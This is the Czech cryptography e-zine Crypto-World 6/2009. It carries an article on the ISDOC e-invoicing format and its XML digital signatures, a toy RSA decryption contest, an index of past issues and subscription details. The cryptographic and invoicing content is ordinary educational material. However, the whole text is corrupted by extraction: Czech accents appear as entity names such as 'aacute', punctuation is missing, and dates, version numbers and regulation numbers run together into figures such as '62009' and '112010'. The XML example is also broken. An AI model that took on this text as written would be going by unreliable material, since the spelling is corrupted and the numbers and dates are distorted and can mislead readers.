I když si tento bod možnaacute zdaacutenlivě odporuje s bodem předchoziacutem je takeacute důležityacute Formaacutet totiž připouštiacute i možnost třetiacute strany - zprostředkovatele komunikace mezi vyacutestavcem a přiacutejemcem kterou podporuje zvlaacuteštniacutemi bdquoroutovaciacutemildquo položkami Třetiacute strana do původně bilateraacutelniacuteho vztahu přinaacutešiacute zpravidla nějakou dalšiacute přidanou hodnotu za kterou jsou původniacute strany ochotny zaplatit Jedna z nejzajiacutemavějšiacutech je vyřešeniacute bezpečnostniacute problematiky jednotlivyacutech dokladů tak aby je cestou nemohl nikdo monitorovat daacutele to byacutevaacute notifikace přijetiacute dokladu zprostředkovatelem i přiacutejemcem vyřešeniacute souhlasu s přiacutejmem elektronickyacutech dokladů pomociacute všeobecnyacutech podmiacutenek zprostředkovatele a v neposledniacute řadě takeacute častaacute služba spočiacutevajiacuteciacute v archivaci jednotlivyacutech dokladů po zaacutekonnou dobu 10+1 let Přiacutekladem takoveacuteho řešeniacute může byacutet např Českaacute Spořitelna se svou službou FAKTURA 24 či již vyacuteše zmiacuteněnyacute systeacutem Datovyacutech schraacutenek kteryacute nabiacutedne oproti jinyacutem zaacutekonnou fikci doručeniacute dokumentu ve lhůtě 10 dnů Důsledkem možnosti využiacutet služeb intermediaacutetora nad formaacutetem ISDOC je možnost použitiacute stejneacuteho formaacutetu i pro relativně velkeacute subjekty jako jsou napřiacuteklad dodavateleacute ze segmentu utilit (tj energie vodaacuterenstviacute atd)

Formaacutet je pouze jeden

Pro pochopeniacute vyacuteznamu tohoto bodu je užitečneacute se podiacutevat do světa EDI (myšleno UN EDIFACT) což je dalšiacute formaacutet kteryacute naacuteš zaacutekon o DPH pro elektronickeacute daňoveacute doklady připouštiacute Definuje jej odkazem na bdquoDoporučeniacute komise 1994820ES ze dne 19řiacutejna 1994ldquo Zde je situace takovaacute že jednotliviacute dodavateleacute EDI řešeniacute často oborově zaměřeniacute si mohou z mnoha standardniacutech položek formaacutetu vybrat pro sveacute použitiacute pouze některeacute a na těch vystavět svůj tzv subset Vyacutesledkem je že firma kteraacute maacute ve sveacutem ISERP implemenovaacuten subset A přiacutemo nemůže komunikovat s firmou majiacuteciacute implementovaacuten subset B Musiacute z principu využiacutet služeb třetiacute strany kteraacute umiacute převeacutest protokoly jednotlivyacutech subsetů mezi

Crypto-World 62009

14

sebou což typicky byacutevaacute placenaacute služba Naproti tomu u formaacutetu ISDOC nic takoveacuteho neniacute třeba protože formaacutet je prostě jen jeden Samozřejmě je třeba se popasovat s probleacutemem oborovyacutech specifik kteryacute je v ISDOC vyřešen pomociacute hlavičkovyacutech a řaacutedkovyacutech uživatelskyacutech položek To jsou elementy v jejichž raacutemci může byacutet umiacutestěna libovolnaacute uživatelskaacute XML struktura kteraacute na rozdiacutel od zbytku formaacutetu nepodleacutehaacute kontrole pomociacute XSD scheacutematu a tudiacutež neniacute třeba s každou takovou uživatelskou variantou měnit zaacutekladniacute XSD scheacutema

Obecně je možneacute řiacuteci že Pracovniacute skupina pracovala celyacutech 14 měsiacuteců na tom aby formaacutet zohlednil všechna důležitaacute specifika českeacute daňoveacute legislativy Našiacutem ciacutelem bylo aby formaacutet byl schopen nahradit 95 faktur ktereacute se doposud vyskytovaly v papiacuterovyacutech firemniacutech transakciacutech Důsledkem vyacuteše zmiacuteněnyacutech vlastnostiacute pak je že pokud libovolnaacute firma použiacutevaacute fakturačniacute software podporujiacuteciacute formaacutet ISDOC a elektronicky fakturuje tak libovolneacute jineacute firmy podporujiacuteciacute takteacutež formaacutet ISDOC mohou tyto faktury přijiacutemat a jejich systeacutem je umiacute interpretovat A pokud přijiacutemaciacute systeacutem objeviacute uživatelskeacute položky kteryacutem rozumiacute tak je použije pokud ne tak je ignoruje V každeacutem přiacutepadě je ale faktura načtena jak položkově tak finančně Aby pravděpodobnost spraacutevneacute interpretace byla co nejvyššiacute iniciovalo sdruženiacute SPIS již jmenovanou ldquoDeklaraci o společneacutem postupu v oblasti elektronickeacute fakturacerdquo na ktereacute se kromě již zmiacuteněnyacutech firem shodli i dalšiacute vyacuteznamneacute firmy z oboru ISERP jako jsou Karat Software Gordic Asseco ČR či dokonce zaacutestupci nadnaacuterodniacutech gigantů jako Microsoft nebo SAP ČR Po vyhlaacutešeniacute formaacutetu v březnu 2009 se k Deklaraci začaly připojovat dalšiacute firmy K 162009 je jejich vyacutečet naacutesledujiacuteciacute Accord ALTEC ALTUS software COMPEKON MICRODATA ORTEX TILL CONSULT TRIADA VERA a WinStrom

Z čeho jsme vychaacutezeli Formaacutet ISDOC vychaacuteziacute filozoficky z formaacutetu UBL 20 definovaneacuteho mezinaacuterodniacutem sdruženiacutem OASIS (wwwoasis-openorg) Z teacuteto normy jsme původně vyšli a chviacuteli se zdaacutelo že budeme moci jen popsat co ktereacute položky znamenajiacute a můžeme začiacutet implementovat do svyacutech systeacutemů Časem se ale začaly objevovat probleacutemy jak naplnit ten či onen legislativniacute požadavek a v určitou chviacuteli bylo jasneacute že budeme muset pro některeacute funkčnosti použiacutet vlastniacute položky protože UBL nic podobneacuteho neřešiacute (napřiacuteklad problematika daňovyacutech zaacuteloh počiacutetaacuteniacute DPH metodou zdola nebo shora atd) Tak se v naacutevrhu objevil kromě čtyř původniacutech jmennyacutech prostorů i jeden novyacute ndash bdquoisdldquo ve ktereacutem jsme koncentrovali veškereacute noveacute či pozměněneacute položky Když jsme začali daacutevat dohromady jednotlivaacute XML scheacutemata (soubory XSD) tak se velmi rychle ukaacutezalo že vyacuteslednyacute popis i formaacutet je složityacute a nepřehlednyacute A tak jsme nakonec definovali jedinyacute jmennyacute prostor kteryacute cca z 12 vychaacuteziacute z položek a datovyacutech typů UBL a ze druheacute poloviny je doplněn položkami vlastniacutemi Všechny položky majiacute samozřejmě anglickeacute naacutezvy a kde to bylo možneacute použili jsme datovyacute typ shodnyacute s UBL 20

Hlavniacute rysy technickeacuteho řešeniacute Viacutece druhů dokladů faktura čniacute povahy

Jak již bylo zmiacuteněno formaacutet ISDOC řešiacute všechny zaacutekladniacute dokumenty fakturačniacute povahy ktereacute se mohou vyskytovat v běžneacute firemniacute praxi Jednaacute se konkreacutetně o fakturu vč podpory zuacutečtovaacuteniacute daňovyacutech i přiacutepadnyacutech nedaňovyacutech zaacutelohovyacutech listů dobropis vrubopis zaacutelohovou fakturu (myšleno nedaňovyacute zaacutelohovyacute list) daňovyacute zaacutelohovyacute list a dobropis daňoveacuteho zaacutelohoveacuteho listu

Crypto-World 62009

15

Doklady v miacutestniacute i ciziacute měně

Všechny doklady mohou byacutet buď v miacutestniacute nebo v jedneacute ciziacute měně Tuto omezujiacuteciacute podmiacutenku jsme stanovili po analyacuteze vyacuteskytu cizoměnnyacutech dokladů s viacutece než jednou měnou Podle našich zjištěniacute je takovyacutech dokladů jen velmi maleacute množstviacute Z tohoto důvodu a současně takeacute z důvodu neuacuteměrneacuteho zkomplikovaacuteniacute vnitřniacutech vazeb jsme rozhodli se touto variantou nadaacutele nezabyacutevat Identifikace až 5-ti různyacutech stran na dokladu

Protože na dokladech se běžně vyskytujiacute kromě adres odběratele a dodavatele zapsanyacutech v obchodniacutem rejstřiacuteku ještě adresy dalšiacute např adresy fakturačniacutech miacutest či adresy dodaacuteniacute podporuje ISDOC až 5 takovyacutech Důležiteacute je to i proto že zaacutekon dovoluje pověřit fakturaciacute třetiacute osobu Důležiteacute je že rozlišovaciacute položky pro identifikaci firem dovolujiacute použitiacute jak firemniacutech (proprietaacuterniacutech) koacutedů tak celosvětovyacutech GLN (Global Location Number) identifikaacutetorů a samozřejmě takeacute naacuterodniacutech identifikačniacutech čiacutesel kteryacutem je v ČR uacutedaj IČ

Identifikace zbožiacute až 5-ti rozlišujiacuteciacutemi uacutedaji

Podobně jako v přiacutepadě firem je u rozlišeniacute zbožiacute podporovaacuteno hned několik druhů identifikaacutetorů Jsou to až 3 různeacute koacutedy podle dodavatele daacutele globaacutelniacute identifikaacutetor typu EAN a pro spolupraacutece typu bdquomalyacute dodavatel a obrovskyacute odběratelldquo i koacutedy zbožiacute podle odběratele

Podpora seacuteriovyacutech čiacutesel a šaržiacute vč expiraciacute

Protože předmětem obchodu a tedy i fakturace je často zbožiacute u ktereacuteho je třeba evidovat jednotlivaacute seacuteriovaacute čiacutesla (typicky velkaacute elektronika) nebo seacuterie zbožiacute se stejnou šaržiacute (typicky leacuteky či potraviny) obsahuje ISDOC přiacuteslušneacute kolekce i na tyto eventuality

Možnost použitiacute tzv uživatelskyacutech položek

Technicky se jednaacute o zvlaacuteštniacute nevalidovaneacute kolekce hlavičkovyacutech a řaacutedkovyacutech položek ktereacute nejsou zaacuteměrně nijak svaacutezaacuteny s hlavniacutem XSD scheacutematem Tiacutem je možno ve standardizovaneacutem formaacutetu použiacutevat i položky na kteryacutech se vyacutestavce a přiacutejemce dohodli bilateraacutelně Napřiacuteklad bude-li nutno na fakturačniacutem řaacutedku se spotřebou elektrickeacute energie v KWh přeneacutest ještě doplňkovou informaci v jakyacutech sazbaacutech se čerpaacuteniacute uskutečnilo jakyacute byl paušaacutelniacute poplatek za konkreacutetniacute elektroměr a nakolik zaacutekaniacutek využil možnost vyacutekupu zeleneacute energie tak je to touto cestou možneacute aniž je nutno měnit celkovou verzi formaacutetu a na všech stranaacutech jiacute implementovat V praxi tak informačniacute systeacutemy vyacutestavce a přiacutejemce mohou byacutet upraveny k použiacutevaacuteniacute těchto položek zatiacutemco ostatniacute systeacutemy tyto položky nebudou interpretovat protože tyto nejsou popsaacuteny ve validačniacutech scheacutematech Položky povinneacute pro daňovyacute doklad však obsahuje každyacute soubor ISDOC

Řešeniacute přiacuteloh jako dokumentů majiacuteciacutech praacutevniacute relevanci k faktuře

Protože v papiacuteroveacute praxi se často vyskytujiacute u faktur takeacute přiacutelohy ktereacute mohou miacutet i praacutevniacute relevanci k mateřskeacutemu dokladu museli jsme za viděniacute ciacutele nahradit papiacuteroveacute řešeniacute elektronickyacutem řešit i tyto situace Přiacutelohy mohou obsahovat napřiacuteklad všeobecneacute obchodniacute podmiacutenky přiacutelohou může byacutet kalkulačniacute list k faktuře na parkety stejně jako fotografie billboardu k faktuře na reklamniacute služby Řešeniacute se v zaacutesadě děliacute na ty ktereacute musiacute omezit velikost přiacuteloh a na ty ostatniacute kde to nutneacute neniacute K omezeniacute velikosti přiacuteloh se přistupuje v přiacutepadě kdy přiacutelohy jsou součaacutestiacute samotneacuteho XML (v přiacuteslušneacutem koacutedovaacuteniacute např BASE64) a jejich nadměrnaacute velikost by tak mohla zcela ochromit zachaacutezeniacute s přiacuteslušnyacutem souborem (funce načteniacute do paměti verifikace proti XSD atd) Proto jsme se v definici ISDOC vydali druhou cestou kterou je udržovaacuteniacute přiacuteloh mimo vlastniacute XML soubor ndash v jineacutem datoveacutem

Crypto-World 62009

16

kontejneru Formaacutet ISDOC jsou tedy ve skutečnosti formaacutety dva Jeden je soubor isdoc což je vnitřně bdquoklasickyacuteldquo XML soubor kteryacute neobsahuje žaacutedneacute přiacutelohy a použije se praacutevě v tomto přiacutepadě Druhyacutem formaacutetem je soubor isdocx kteryacute je vnitřně souborem typu ZIP a kteryacute může kromě bdquohlavniacuteholdquo souboru isdoc neacutest i libovolneacute dalšiacute soubory jako přiacutelohy daneacuteho dokladu Vtip je v tom že jednotliveacute přiacutelohy jsou referencovaacuteny v přiacuteslušneacute kolekci bdquohlavniacuteholdquo isdoc souboru svyacutem jmeacutenem a SHA1 otiskem A jak již bylo uvedeno celyacute obsah dokladu isdoc je podepsaacuten elpodpisem Tiacutem jsou soubory přiacuteloh sice technicky umiacutestěny vně XML (a nezdržujiacute jeho zpracovaacuteniacute) ale současně se jakaacutekoliv manipulace s přiacutelohami okamžitě projeviacute porušeniacutem SHA1 otisků jednotlivyacutech přiacuteloh přiacutepadně rovnou neplatnostiacute elektronickeacuteho podpisu celeacute faktury pokud by se někdo pokoušel v niacute SHA1 otisky přiacuteloh ručně přepsat Tiacutem by byl soubor isdoc prohlaacutešen za neautentickyacute (pozměněnyacute) Vyacutesledneacute řešeniacute tedy splňuje splňuje stejnaacute bezpečnostniacute kriteacuteria jako kdyby přiacutelohy byly celeacute součaacutestiacute jedineacuteho podepsaneacuteho XML

Vlastniacute implementace elektronickeacuteho podpisu Po provedeniacute rešerše technik podepisovaacuteniacute jsme pro přiacutepad podepisovaacuteniacute XML souboru isdoc zvolili normu XMLSig metodu Enveloped Jejiacutem principem je že těsně před ukončeniacutem rootoveacuteho elementu kteryacutem je v našem přiacutepadě element ltInvoicegt se vložiacute element ltSignaturegt ve ktereacutem se celyacute podpis odehraacutevaacute Uvnitř tohoto elementu jsou pak tři dalšiacute ltSignedInfogtltSignatureValuegtltKeyInfogt Element ltSignedInfogt obsahuje kromě popisu algoritmů digitaacutelniacuteho otisku algoritmů kanonikalizace a elektronickeacuteho podpisu hlavně vlastniacute digitaacutelniacute otisk celeacuteho XML dokumentu a to v elementu ltDigestValuegt Kanonikalizace je metoda kteraacute uvnitř struktury XML vyřadiacute přebytečneacute mezery viacutecenaacutesobneacute konce řaacutedků a dalšiacute neproduktivniacute znaky Pozor ale tato metoda nijak nemanipuluje s vlastniacutemi daty jednotlivyacutech elementů ktereacute i po kanonikalizaci zůstaacutevajiacute v původniacutem tvaru řešiacute pouze znaky ve struktuře XML Napřiacuteklad tedy pokud atribut nějakeacuteho elmentu je zbytečně posunut vpravo a podobně Po kanonikalizaci je proveden otisk přiacuteslušnyacutem algoritmem a pak je již programem složen celyacute element ltSignedInfogt Na tento element je naacutesledně aplikovaacuten elektronickyacute podpis zvolenou metodou v drtiveacute většině se použiacutevaacute algoritmus RSA a vyacutesledek je uložen do elementu ltSignatureValuegt Aby přiacutejemce měl vždy po ruce veřejnyacute kliacuteč podepisujiacuteciacute osoby je jako třetiacute element přidaacutena binaacuterniacute reprezentace jeho certifikaacutetu a to do jednoho z podelementů elementu ltKeyInfogt

Poznaacutemka od 112010 je podle světovyacutech doporučeniacute zapovězeno v systeacutemech veřejneacute spraacutevy v ČR použiacutevaacuteniacute digitaacutelniacutech otisků algoritmem SHA1 a je nutno přejiacutet na některyacute vyššiacute algoritmus z rodiny SHA2 napřiacuteklad SHA256 Pracovniacute skupina SPIS na tomto probleacutemu aktuaacutelně pracuje

Konkreacutetniacute provedeniacute podpisu v XML souboru faktury by mohlo po určiteacutem zjednodušeniacute a naformaacutetovaacuteniacute vypadat např takto

ltxml version=10 encoding=utf-8gt ltInvoice xmlns=httpisdoccznamespaceinvoice version=51gt lt--helliphelliphelliphelliphelliphellip--gt ltmdashpoložky dokumentu faktura--gt lt--helliphelliphelliphelliphelliphellip--gt ltPaymentMeansgt ltmdashposledni element nepodepsane faktury- --gt ltPaymentMeansgt

Crypto-World 62009

17

ltSignature xmlns=httpwwww3org200009xmldsi ggt ltSignedInfogt

ltCanonicalizationMethod Algorithm=httpwwww3or gTR2001REC-xml- c14n-20010315gt ltSignatureMethod Algorithm=httpwwww3org2000 09xmldsigrsa- sha1gt

ltReference URI=gt ltTransformsgt

ltTransform Algorithm=httpwwww3org200009xml dsigenveloped-signaturegt

ltTransformsgt ltDigestMethod Algorithm=httpwwww3org2000 09xmldsigsha1gt ltDigestValuegt29hg161shG5T0cuwyUEQZiHmn4=ltDiges tValuegt ltReferencegt ltSignedInfogt ltSignatureValuegtrJgOKTSyaGb5 atd==ltSignatureVa luegt ltKeyInfogt ltX509Datagt ltX509CertificategtMIIEVCCAz+gAKoZIhvcNAQAwaDELmak GA1UEBhMCQ1ox hellip vlastni klientskyacute certifikaacutet hellip qoF4Y1IgJ0w16ws= ltX509Certificategt ltX509Datagt ltKeyInfogt ltSignaturegt ltInvoicegt

Podpora formaacutetu v jednotlivyacutech ISERP V době psaniacute tohoto člaacutenku (červen 2009) ještě neniacute možneacute hodnotit uacuteroveň implementace v jednotlivyacutech IS protože většina vyacuterobců jiacute plaacutenuje až do podzimniacutech nebo zimniacutech legislativniacutech verziacute Nepochybně bude velmi zajiacutemaveacute porovnat jak jednotliviacute vyacuterobci k implementaci formaacutetu ISDOC ve svyacutech systeacutemech přistoupili Ať to ale provedou tak či onak důležiteacute je že fakturu nebude v systeacutemu přiacutejemce třeba znovu typovat a že položky budou automaticky (nebo alespoň poloautomaticky) rozeznaacuteny V tom se skryacutevaacute siacutela celeacuteho řešeniacute na straně přiacutejemce

Podpora formaacutetu externiacutemi naacutestroji Pro uacutečely podpory průmysloveacuteho nasazeniacute formaacutetu ISDOC již existujiacute i externiacute naacutestroje Jeden z nich vyvinula firma ABRA Software a pojmenovala jej ISDOCReader Jde o freeware tj program kteryacute je možneacute kdykoliv staacutehnout z přiacuteslušneacute adresy (wwwisdocorg) a začiacutet jej volně použiacutevat Tento naacutestroj provede po instalaci asociaci s oběma variantami formaacutetu ISDOC (isdoc i isdocx) a stane se tak vyacutechoziacutem prohliacutežečem tohoto formaacutetu ISDOCReader dovoluje libovolnyacute fakturačniacute doklad zobrazit do vizuaacutelniacute podoby faktury ověřit přiacuteslušnyacutem tlačiacutetkem elektronickyacute podpis dokladu přiacutepadně si doklad i vytisknout Je takeacute možneacute prohliacutežet a exportovat přiacutepadneacute přiacutelohy faktury Dalšiacutem krokem bdquoworkflowldquo zpracovaacuteniacute došleacute elektronickeacute faktury v menšiacute firmě je pak jejiacute postoupeniacute k automatickeacutemu či poloautomatickeacutemu zpracovaacuteniacute do ISERP přiacutejemce k čemuž je opět přiacuteslušneacute tlačiacutetko Technicky bude možnost odeslaacuteniacute dokladu do libovolneacuteho ISERP vyřešena pomociacute konfiguračniacuteho souboru kteryacute si každyacute vyacuterobce bude moci daacutet do sveacute instalace a kteryacute ISDOCReader bude volat

Crypto-World 62009

18

Přiacuteklad použitiacute freewaroveacuteho naacutestroje ISDOCReader na ověřeniacute elpodpisu

Pokud se některyacute z laskavyacutech čtenaacuteřů bude zajiacutemat o projekt ISDOC podrobněji dalšiacute informace včetně posledniacute verze formaacutetu dokumentace jeho datovyacutech struktur přiacutekladů datovyacutech souborů i aktuaacutelniacutech uacutedajů o podpoře formaacutetu jednotlivyacutemi vyacuterobci software nalezne na adrese wwwisdoccz Literatura

[1] Kolektiv autorů Dokumentace ke standardu UBL 20 [online] Dostupnyacute z WWW lthttpdocsoasis-openorgublcs-UBL-20UBL-20htmlgt

[2] Kosek Jiřiacute XML scheacutemata [online] Dostupnyacute z WWW lthttpwwwkosekczxmlschemawxshtmlgt

[3] Kolektiv autorů XSD Schema tutorial [online] Dostupnyacute z WWW lthttpwwww3schoolscomschemadefaultaspgt

[4] Kolektiv autorů sdruženiacute W3c Dokumentace ke Xmldsig [online] Dostupnyacute z WWW lthttpwwww3orgTRxmldsig-coregt

[5] Kolektiv autorů Pracovniacute skupiny pro elektronickou fakturaci SPIS Dokumentace k formaacutetu ISDOC [online] Dostupnyacute z WWW lthttpwwwisdocczgt

Crypto-World 62009

19

D Malaacute soutěž v luštěniacute RSA Pavel Vondruška (pavelvondruskacrypto-worldinfo)

Pro přiacuteznivce našich podzimniacutech soutěžiacute v luštěniacute ale samozřejmě i dalšiacute čtenaacuteře jsem připravil naacutesledujiacuteciacute drobnou uacutelohu Soutěžniacutem uacutekolem je rozluštěniacute šifroveacuteho textu 14 39 07 57 18 34 10 47 17 92 06 31 28 65 32 92 11 41 26 31 26 29 20 80 25 06 00 77 03 60 09 00 03 60 11 44 31 00 05 41 07 92 06 16 04 70 10 75 03 60 18 79 00 46 26 73 23 49 25 18 13 90 K zašifrovaacuteniacute otevřeneacuteho textu byl použit algoritmus RSA a formaacutetovaacuteniacute CW10 (detaily viz naacutepověda) veřejnyacute kliacuteč je (Ne)=(3337 79)

Při luštěniacute se řešitel seznaacutemiacute s algoritmem RSA a uvědomiacute si jak uacutezce souvisiacute bezpečnost algoritmu s modulem N Pro prveacute dva řešitele je připravena odměna V přiacutepadě zaacutejmu se mohou bezplatně zuacutečastnit kurzu Problematika infrastruktury veřejnyacutech kliacutečů (PKI)ldquo kterou 2562009 pořaacutedaacute akademie CZNIC (httpwwwnicczakademiecourse15detail) Lektorem kurzu je PVondruška Svaacute řešeniacute zasiacutelejte na adresu pavelvondruskacrypto-worldinfo Řešeniacute uacutelohy a jmeacutena všech uacutespěšnyacutech luštitelů budou zveřejněna v letniacutem dvojčiacutesle e-zinu Crypto-World 7-82009 kteryacute vyjde 182009 Z tohoto důvodu společně s řešeniacutem zašlete souhlas se zveřejněniacutem sveacuteho jmeacutena resp nickpseudonym kteryacute může byacutet miacutesto něj zveřejněn Přeji pěknou zaacutebavu

Doplňujiacuteciacute informace k soutěžniacute uacuteloze

1 Použityacute šifrovaciacute algoritmus

V podstatě se jednaacute o klasickyacute šifrovaciacute algoritmus založenyacute na RSA kde však otevřenyacute text neniacute formaacutetovaacuten podle PKCS 1 (verze 152021) ale podle naacutemi zadanyacutech pravidel kteraacute označiacuteme jako CW 10 2 Asymetrickyacute algoritmus RSA

Zvoliacuteme prvočiacutesla p a q a vypočteme N = pq

Φ(N) = (p-1)(q-1)

Daacutele zvoliacuteme naacutehodneacute čiacuteslo e kde

Crypto-World 62009

20

1 lt e lt Φ(N) takoveacute že e a Φ(N) jsou nesoudělnaacute

Vypočteme čiacuteslo d takoveacute že

1 lt d lt Φ(N) a

ed equiv 1 mod Φ(N)

Dvojici (Nd) nazveme soukromyacute kliacuteč a (Ne) veřejnyacute kliacuteč

3 Formaacutetovaacuteniacute zpraacutevy (CW10)

Zpraacutevu M překoacutedujeme nejprve do čiacuteselneacuteho tvaru K tomu použijeme některou vhodnou převodovou tabulku Např tuto tabulku

0 1 2 3 4 5 6 7 8 9 6 0 Mezera 2 3 4 A B C D E 7 F G H I J K L M N O 8 P Q R S T U V W X Y 9 Z 1 2 3 4 5 6 7 8 9 Zpraacutevu M pak zformaacutetujeme do posloupnosti čiacutesel pevneacute deacutelky (deacutelka bude rovna deacutelce modulu N) K tomu použijeme vlastniacute formaacutetovaacuteniacute kteraacute pracovně nazveme CW10 Formaacutetovaacuteniacute CW10 1) Maacute-li modul deacutelku k budeme zpraacutevu převedenou podle tabulky dělit na skupiny deacutelky k-1 2) Všechny skupiny musiacute miacutet deacutelku k-1 nemaacute-li proto posledniacute skupina tuto deacutelku doplniacuteme

ji zprava přiacuteslušnyacutem počtem nul 3) Všechny ziacuteskaneacute skupiny nyniacute doplniacuteme zleva jednou nulou Deacutelka každeacute skupiny je po

těchto uacutepravaacutech rovna k 4) Vyacutesledek po šifrovaacuteniacute maacute deacutelku rovnou maximaacutelně k nemaacute-li ji doplniacuteme vyacutesledek zleva

nulami Ziacuteskanyacute vyacutesledek po formaacutetovaacuteniacute M označme M= m1 m2 m3 hellip 4 Zašifrovaacuteniacute zpraacutevy M

Zašifrovaacuteniacutem zpraacutevy M pomociacute veřejneacuteho kliacuteče (Ne) rozumiacuteme řetězec

P = C1 C2 C3 kde

C1 equiv m1e mod N C2 equiv m2

e mod N C3 equiv m3e mod N Ci equiv mi

e mod N

5 Dešifrovaacuteniacute zpraacutevy P

Dešifrovaacuteniacute zpraacutevy P se pak provede tak že použijeme soukromyacute exponent d a tiacutem ziacuteskaacuteme původniacute zpraacutevu M

m1 equiv C1d mod N m2 equiv C2

d mod N m3 equiv C3d mod N mi equiv Cid mod N

6 Bezpečnost Pokud dokaacuteže přiacutejemce udržet svůj soukromyacute kliacuteč v tajnosti (a čiacutesla p a q byla dostatečně velkaacute) pak je ze znalosti šifroveacute zpraacutevy a veřejneacuteho kliacuteče vyacutepočetně složiteacute ziacuteskat otevřenou zpraacutevu

Crypto-World 62009

21

E O čem jsme psali v červnu 2000 ndash 2008 Crypto-World 62000 A Novaacute evropskaacute iniciativa v oblasti kryptografie (JPinkava) 2 B Fermatův test primality Carmichaelova čiacutesla bezčtvercovaacute čiacutesla (PVondruška)3 -5 C Červ LOVE-LETTER-FOR-YOUTXTVBS (PVondruška) 6-8 D EUROCRYPT 2000 (PVondruška) 9-11 E Code Talkers (IIIdiacutel) (PVondruška) 12-14 F Letem šifrovyacutem světem 15 G Zaacutevěrečneacute informace 16 Přiacuteloha Navajo Code Talkers revize z 1561945 soubor Dictionaryhtm

Crypto-World 62001 A Zaacutehadnaacute paacuteska z Prahy IIdiacutel (PVondruška JJanečko) 2- 6 B Radioaktivniacute rozpad a kryptografickeacute kliacuteče (LSmoliacutek) 7-9 C Kryptografie a normy diacutel 8 - Normy IETF - SMIME (J Pinkava) 10-13 D Počiacutetačovyacute kurs Lidovyacutech novin (PVondruška) 14-15 E Security and Protection of Information (D Cvrček) 16 F Praacutevniacute odpovědnost poskytovatelů (JMatejka) 17-23 G Ukončeniacute platnosti zneplatněniacute (a zrušeniacute) certifikaacutetu IIdiacutel (JProkeš) 24-25 H Letem šifrovyacutem světem 26-27 I Zaacutevěrečneacute informace 28 Přiacuteloha priloha6zip (fotografie Security 2001 teacutemata přednaacutešek na konferenci Eurocryptacute2001)

Crypto-World 62002 A Historie a statistika Crypto-Worldu (PVondruška) 2-4 B Digitaacutelniacute certifikaacutety IETF-PKIX čaacutest 4 (JPinkava) 5-8 C Bezpečnost informačniacuteho systeacutemu pro certifikačniacute služby (ISCS)

a objektovaacute bezpečnost (PVondruška) 9-16 D Informace - Cryptology ePrint Archive (VKliacutema) 17 E Letem šifrovyacutem světem 18-19

1 Kritika člaacutenku Je 1024-bitovaacute deacutelka kliacuteče RSA dostatečnaacute (Crypto-World 52002)

2 Zaacutekon o elektronickeacutem podpisu novelizovaacuten - Zaacutekon č 2262002 Sb 3 Hackeři pomozte 4 O čem jsme psali v červnu 2000 a 2001

F Zaacutevěrečneacute informace 20

Crypto-World 62003 A Nebezpečiacute internetovyacutech řešeniacute (MKuchař) 2-6 B Digitaacutelniacute certifikaacutety IETF-PKIX čaacutest 13

Atributoveacute certifikaacutety ndash diacutel 2 (JPinkava) 7-10 C Kryptografickeacute protokoly s nulovyacutem předaacuteniacutem znalostiacute(JPinkava) 11-12 D Elektronickeacute peniacuteze (PVondruška) 13-20 E Letem šifrovyacutem světem 21-23 F Zaacutevěrečneacute informace 24

Crypto-World 62009

22

Crypto-World 62004 A Měsiacutec prvočiacutesel (PVondruška) 2-5 B Statistickyacute rozbor největšiacuteho prvočiacutesla (PTesař) 6-7 C Program STORK - vstupniacute dokumenty přiacuteprava (E-CRYPT) čaacutest 2 (JPinkava) 8-16 D Letem šifrovyacutem světem 17-18 E Zaacutevěrečneacute informace 19

Crypto-World 62005 A Informace pro čtenaacuteře a autory (PVondruška) 2-3 B Kontrola certifikačniacute cesty čaacutest 1 (P Rybaacuter) 4-11 C O neziacuteskateľnosti rodneacuteho čiacutesla z jeho hashu (M Pivoluska) 12-13 D Přehledovaacute zpraacuteva o vyacuteznamnyacutech publikaciacutech a projektech na teacutema

poskytovaacuteniacute anonymity klasifikace a měřitelnost informačniacuteho soukromiacute (privacy) čaacutest 2 (M Kumpošt) 14-17

E Kryptografickeacute eskalačniacute protokoly čaacutest 1 (J Krhovjaacutek) 18-21 F Recenze knihy Jon Erickson Hacking - uměniacute exploitace 22 G O čem jsme psali v červnu 2000-2004 23 H Zaacutevěrečneacute informace 24

Crypto-World 62006 A PKI roaming (L Dostaacutelek) 2-4 B Vyhlaacuteška o podrobnostech atestačniacuteho řiacutezeniacute pro elektronickeacute naacutestroje

a lehkyacute uacutevod do časoveacute synchronizace (P Vondruška) 5-9 C Univerzaacutelniacute posilovače hašovaciacutech funkciacute včetně MD5 a SHA1

aneb zaacutechranneacute kolo pro zoufalce (V Kliacutema) 10-14 D NIST (National Institute of Standards and Technology - USA) a kryptografie Recommendation on Key Management ndash čaacutest 2

(J Pinkava) 15-18 E O čem jsme psali v červnu 1999-2005 19-20 F Zaacutevěrečneacute informace 21

Crypto-World 62007 A Přehled a historie polyalfabetickyacutech šifer (PVondruška) 2-11 B Matematizace komplexniacute bezpečnosti v ČR čaacutest I (JHrubyacute) 12-20 C Mikulaacutešskaacute kryptobesiacutedka Call for Papers 21 D O čem jsme psali v červnu 2000-2006 22-23 E Zaacutevěrečneacute informace 24 Přiacuteloha Mikulaacutešskaacute kryptobesiacutedka (6-7122007)- MKB2007_CallForPapers_cervenpdf

Crypto-World 62008 A RFID Co to vlastně maacuteme v kapse (MHlavaacuteč TRosa) 2 - 17 B Bezpečnost PHP aplikaciacute (JVraacutena) 18 - 22 C Popis šifrovaciacuteho algoritmu Serpent (JJeřaacutebek) 24 - 29 D O čem jsme psali v červnu 2000-2007 30 ndash 31 E Zaacutevěrečneacute informace 32

Crypto-World 62009

23

F Zaacutevěrečneacute informace 1 Sešit Crypto-World je oficiaacutelniacute informačniacute sešit Kryptologickeacute sekce Jednoty českyacutech matematiků a fyziků (GCUCMP) Obsahuje člaacutenky podepsaneacute autory Přiacutepadneacute chyby a nepřesnosti jsou diacutelem PVondrušky a autorů jednotlivyacutech podepsanyacutech člaacutenků GCUCMP za ně nemaacute odbornou ani jinou zodpovědnost Adresa URL na niacutež můžete najiacutet tento sešit (zpravidla 3 tyacutedny po jeho rozeslaacuteniacute) a předchoziacute sešity GCUCMP denně aktualizovaneacute novinky z kryptologie a informačniacute bezpečnosti normy standardy straacutenky některyacutech členů a dalšiacute souvisejiacuteciacute materiaacutely httpcrypto-worldinfo 2 Registrace zrušeniacute registrace Zaacutejemci o e-zin se mohou zaregistrovat pomociacute e-mailu na adrese pavelvondruskacrypto-worldinfo (předmět Crypto-World) nebo použiacutet k odeslaacuteniacute žaacutedosti o registraci elektronickyacute formulaacuteř na httpcrypto-worldinfo Při registraci vyžadujeme pouze jmeacuteno a přiacutejmeniacute titul pracoviště (neniacute podmiacutenkou) a e-mail adresu určenou k zasiacutelaacuteniacute koacutedů ke staženiacute sešitu Ke zrušeniacute registrace stačiacute zaslat kraacutetkou zpraacutevu na 